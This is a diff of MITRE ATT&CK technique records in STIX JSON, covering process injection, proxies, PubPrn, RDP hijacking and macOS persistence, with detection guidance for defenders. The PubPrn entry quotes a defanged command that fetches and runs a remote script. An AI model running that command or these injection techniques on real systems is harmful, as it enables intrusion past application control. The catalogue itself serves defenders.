+ "Application control",
"Anti-virus"
],
"x_mitre_data_sources": [
@@ -20116,8 +20829,7 @@
"x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
- "Linux",
- "macOS"
+ "Linux"
]
},
{
@@ -20149,27 +20861,27 @@
],
"modified": "2020-03-26T18:05:53.130Z",
"created": "2017-05-31T21:30:48.728Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "API monitoring",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_system_requirements": [
+ "Administrator, SYSTEM may provide better process ownership details"
],
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
- "x_mitre_system_requirements": [
- "Administrator, SYSTEM may provide better process ownership details"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "API monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "attack-pattern--c1a452f3-6499-4c12-b7e9-a6a0a102af76",
@@ -20272,27 +20984,27 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:05:42.921Z",
+ "modified": "2020-06-20T22:27:21.304Z",
"created": "2020-01-14T17:19:50.978Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg\u00e4nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "User"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg\u00e4nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -20356,24 +21068,24 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:00:39.428Z",
+ "modified": "2020-06-20T22:28:08.758Z",
"created": "2020-01-14T17:21:54.470Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Anti-virus"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -20407,7 +21119,7 @@
"source_name": "GNU Acct"
},
{
- "url": "https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
+ "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
"description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.",
"source_name": "RHEL auditd"
},
@@ -20436,14 +21148,17 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:05:43.152Z",
+ "modified": "2020-06-20T22:28:45.651Z",
"created": "2017-05-31T21:30:47.843Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Anastasios Pingios",
- "Christiaan Beek, @ChristiaanBeek",
- "Ryan Becwar"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"API monitoring",
@@ -20452,16 +21167,13 @@
"Process monitoring",
"Named Pipes"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Anti-virus"
+ "x_mitre_contributors": [
+ "Anastasios Pingios",
+ "Christiaan Beek, @ChristiaanBeek",
+ "Ryan Becwar"
],
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_version": "1.1",
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -20492,20 +21204,20 @@
],
"modified": "2020-03-15T00:40:27.503Z",
"created": "2020-03-15T00:40:27.503Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -20546,11 +21258,9 @@
],
"modified": "2020-03-27T17:15:35.372Z",
"created": "2020-03-15T16:03:39.082Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Network protocol analysis",
"Process monitoring",
@@ -20558,14 +21268,17 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Proxy",
+ "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -20583,10 +21296,9 @@
"source_name": "University of Birmingham C2"
}
],
- "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
- "name": "Proxy",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -20594,7 +21306,7 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-03-27T17:50:37.638Z",
+ "modified": "2020-06-20T20:53:20.670Z",
"created": "2017-05-31T21:31:08.479Z",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
@@ -20649,7 +21361,7 @@
"source_name": "GNU Acct"
},
{
- "url": "https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
+ "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
"description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.",
"source_name": "RHEL auditd"
},
@@ -20677,22 +21389,21 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T20:27:52.470Z",
+ "modified": "2020-06-20T22:24:56.734Z",
"created": "2020-01-14T01:33:19.065Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_data_sources": [
"System calls",
"Process monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux"
]
},
{
@@ -20713,7 +21424,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "PubPrn",
- "description": "Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.\n\nPubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.",
+ "description": "Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.\n\nPubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.",
"id": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -20722,21 +21433,21 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T19:39:37.206Z",
+ "modified": "2020-06-08T23:36:30.648Z",
"created": "2020-02-03T16:49:57.788Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -20760,30 +21471,30 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T17:44:07.769Z",
+ "modified": "2020-06-23T19:03:15.180Z",
"created": "2020-03-09T14:38:24.334Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Python is installed."
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root"
+ ],
+ "x_mitre_detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
"x_mitre_data_sources": [
"System calls",
"Process monitoring",
"Process command-line parameters",
"API monitoring"
],
- "x_mitre_detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "root"
- ],
- "x_mitre_system_requirements": [
- "Python is installed."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
@@ -20819,22 +21530,22 @@
],
"modified": "2020-03-26T18:08:20.049Z",
"created": "2017-05-31T21:30:25.584Z",
- "x_mitre_version": "1.2",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_data_sources": [
- "Windows Registry",
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_data_sources": [
+ "Windows Registry",
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -20880,19 +21591,19 @@
],
"modified": "2020-03-23T23:24:39.182Z",
"created": "2020-02-25T18:35:42.765Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.",
"x_mitre_data_sources": [
"Process monitoring",
"Netflow/Enclave netflow",
"Authentication logs"
+ ],
+ "x_mitre_detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -20958,19 +21669,19 @@
],
"modified": "2020-03-24T23:46:20.433Z",
"created": "2020-01-15T16:25:22.260Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "root"
+ "x_mitre_platforms": [
+ "macOS"
],
- "x_mitre_detection": "The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior. ",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_detection": "The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior. ",
+ "x_mitre_permissions_required": [
+ "root"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--6a3be63a-64c5-4678-a036-03ff8fc35300",
@@ -20993,6 +21704,26 @@
"created": "2017-12-14T16:46:06.044Z"
},
{
+ "created": "2020-01-24T18:15:06.641Z",
+ "modified": "2020-01-24T19:51:37.795Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e",
+ "description": "Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).",
+ "name": "Re-opened Applications",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -21005,26 +21736,6 @@
"source_name": "Methods of Mac Malware Persistence"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Re-opened Applications",
- "description": "Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).",
- "id": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-01-24T19:51:37.795Z",
- "created": "2020-01-24T18:15:06.641Z",
"x_mitre_platforms": [
"macOS"
],
@@ -21071,30 +21782,9 @@
],
"modified": "2020-03-30T13:47:29.922Z",
"created": "2017-05-31T21:31:18.867Z",
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows",
- "AWS",
- "GCP",
- "Azure",
- "Office 365",
- "SaaS",
- "Azure AD"
- ],
- "x_mitre_detection": "Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.\n\nDetection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.\n\nIf an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.\n\nFor alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.",
- "x_mitre_defense_bypassed": [
- "Network intrusion detection system",
- "Anti-virus"
- ],
+ "x_mitre_deprecated": true,
